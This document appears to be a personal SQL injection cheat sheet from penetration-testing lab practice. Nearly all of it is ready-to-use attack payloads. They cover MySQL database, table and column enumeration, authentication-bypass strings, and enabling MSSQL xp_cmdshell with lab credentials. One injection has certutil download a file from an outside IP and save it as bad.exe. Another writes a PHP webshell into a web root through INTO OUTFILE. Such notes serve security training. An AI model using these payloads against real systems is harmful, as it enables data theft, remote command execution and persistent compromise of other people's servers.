Easy Manual SQLi

FOR MYSQL

STEP BY STEP

ORDER BY 

UNION SELECT database()
UNION SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
UNION SELECT distinct(db) FROM mysql.db — priv

#table enumarations
UNION SELECT group_concat(TABLE_NAME) FROM information_schema.tables where table_schema = "DBname"

#colums enumarations
UNION SELECT group_concat(COLUMN_NAME) FROM information_schema.columns where table_schema = "DBname" AND table_name = "tablename"

#output
UNION SELECT group_concat(*) FROM DB.TABLE_NAME

Usefull payloads for Auth bypass:

MySQL
AA'or 1=1 in (SELECT @@version) -- -aa


MSSQL
'order by 1 WAITFOR DELAY '0:0:5'--

MSSQL Command Execution

kali@kali:~$ impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
SQL> EXECUTE sp_configure 'show advanced options', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;

EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

'order by 1 EXEC xp_cmdshell "certutil.exe -urlcache -f http://192.168.45.229/test.txt bad.exe";--

Code Execution in mySQL

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //